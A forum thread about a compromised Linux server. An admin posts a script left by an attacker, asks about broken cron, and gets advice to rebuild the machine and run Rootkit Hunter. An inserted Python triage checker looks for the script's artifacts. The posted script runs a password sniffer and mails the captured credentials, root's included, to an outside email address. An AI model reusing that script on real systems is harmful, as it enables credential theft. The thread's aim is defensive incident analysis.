SSH Hack - IptabLes & IptabLex
My server was recently attacked by a bot; here is a file it left behind.

Code:
    #!/bin/sh
    cd /usr/lib/
    ./popauth -r httpd.log > test   #This part, the output to test, they were able to uncover all users' passwords including root's
    mkdir /usr/share/misc/
    mkdir /usr/share/misc/blah/
    cat /usr/share/misc/blah/temp.log |uniq >> test
    echo >/usr/share/misc/blah/temp.log
    mail deathface2007@yahoo.com -s "$(hostname -f)" < test   #Left his email address behind
    rm -rf test httpd.log
    A=$PATH
    killall -9 popauth
    export PATH=/usr/lib/
    popauth -w httpd.log &
    export PATH=$A

I was able to lock down SSH in /etc/ssh/sshd_config, and remove and kill the hacker's processes and files. But cron is not working now:

Code:
    # service crond restart
    Stopping crond:                                            [FAILED]
    Starting crond: execvp: No such file or directory
                                                               [FAILED]

I tried re-loading the RPMs but it still will not run. The hacker seems to have done something to kill cron. Any ideas of what I can do? Also, is there a way to remove cron altogether so I can reload it?
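A triage check for the artifacts the posted script leaves behind, added here as an example (not from the thread, its posters, or any tool); it assumes Red Hat style crond paths and runs against a constructed test tree and a constructed process line:

```python
"""Triage checks for the sniffer described in the thread above (constructed
example, not from the thread or any tool): looks for the artifacts the
posted script creates, a running 'popauth -w', and a missing cron binary."""
import tempfile
from pathlib import Path

# Paths taken from the posted script, relative to a root directory so the
# check can run against a mounted disk image or a constructed test tree.
ARTIFACTS = {
    "usr/lib/popauth": "sniffer binary the script runs from /usr/lib",
    "usr/lib/httpd.log": "capture file written by 'popauth -w httpd.log'",
    "usr/share/misc/blah": "staging directory created by the script",
    "usr/share/misc/blah/temp.log": "temp log the script mails out",
}
# Assumption: crond lives at one of these paths on a Red Hat style host.
CROND_PATHS = ("usr/sbin/crond", "usr/sbin/cron")

def check_host(root, ps_lines):
    """Return findings for the tree under `root`; `ps_lines` are process
    listing lines (e.g. from `ps aux`) passed in so this runs offline."""
    root = Path(root)
    findings = []
    for rel, why in ARTIFACTS.items():
        if (root / rel).exists():
            findings.append(f"artifact present: /{rel} ({why})")
    for line in ps_lines:
        if "popauth" in line and " -w " in line:
            findings.append(f"sniffer process running: {line.strip()}")
    # 'execvp: No such file or directory' from the init script means the
    # daemon binary itself is gone; reinstalling the package restores it.
    if not any((root / p).is_file() for p in CROND_PATHS):
        findings.append("cron daemon binary missing (explains the execvp error)")
    return findings

def run_demo():
    """Build a constructed tree mimicking the compromised host and check it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel in ("usr/lib/popauth", "usr/lib/httpd.log",
                    "usr/share/misc/blah/temp.log"):
            p = Path(tmp) / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text("constructed sample\n")
        sample_ps = ["root  4242  0.0  0.1 popauth -w httpd.log"]  # constructed
        return check_host(tmp, sample_ps)

if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Point `check_host` at `/` (or a mounted image) and feed it real `ps aux` output to run it on a live host.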
Quote:
Do you know what to do or would you like to know more?
Quote:
My customer runs his entire business on this server, so I am unable to just "cut my losses and do a clean install".

---------- Post added 06-09-14 at 08:01 AM ----------
Quote:
So. Let me phrase this differently then:
- Installing this malware required root privileges: that means it isn't some isolated breach of security but a root compromise.
- You may not have a clue when the cracker gained root rights, what s/he installed or siphoned off of the machine (passwords, private keys, any data).
- If you value your business you wouldn't cheat your customer into thinking all is well. It isn't. So deal with it.

So. What to do? Inform your users and client(s). Set up a new machine. Don't recycle system data, passwords or private keys. Harden it properly. Adhere to best practices. Pull any data (to an intermediate system), separate user data and verify everything before migrating it. Don't allow customers to inject stale software or software of questionable origin including plug-ins, add-ons, themes and whatnot. Ensure auditing is enabled. Remain vigilant always. Respond to alerts in a timely fashion.
Quote:
Thanks for trying to help, but I found another online forum that is helping to solve my problem.
I doubt it.
Quote:
For anyone else: should you want to check then, due to http://rkhunter.cvs.sourceforge.net/....507&r2=1.508& and http://rkhunter.cvs.sourceforge.net/....1&view=markup, you best get Rootkit Hunter from CVS until released officially.